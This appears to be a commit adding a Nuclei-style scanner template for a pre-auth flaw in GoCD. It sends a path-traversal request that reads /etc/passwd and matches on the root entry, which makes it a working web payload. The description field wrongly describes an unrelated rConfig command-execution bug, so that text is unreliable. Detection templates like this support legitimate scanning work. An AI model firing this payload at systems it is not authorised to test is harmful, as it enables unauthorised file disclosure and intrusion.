Create pre-auth-rce-gocd.yaml
parent
8b651ae77b
commit
3eff5e541d
|
@ -0,0 +1,23 @@
|
|||
id: pre-auth-rce-gocd
|
||||
|
||||
info:
|
||||
name: Pre-Auth Takeover of Build Pipelines in GoCD
|
||||
author: dhiyaneshDk
|
||||
severity: critical
|
||||
reference: https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||
tags: go,rce,intrusive
|
||||
description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
Loading…
Reference in New Issue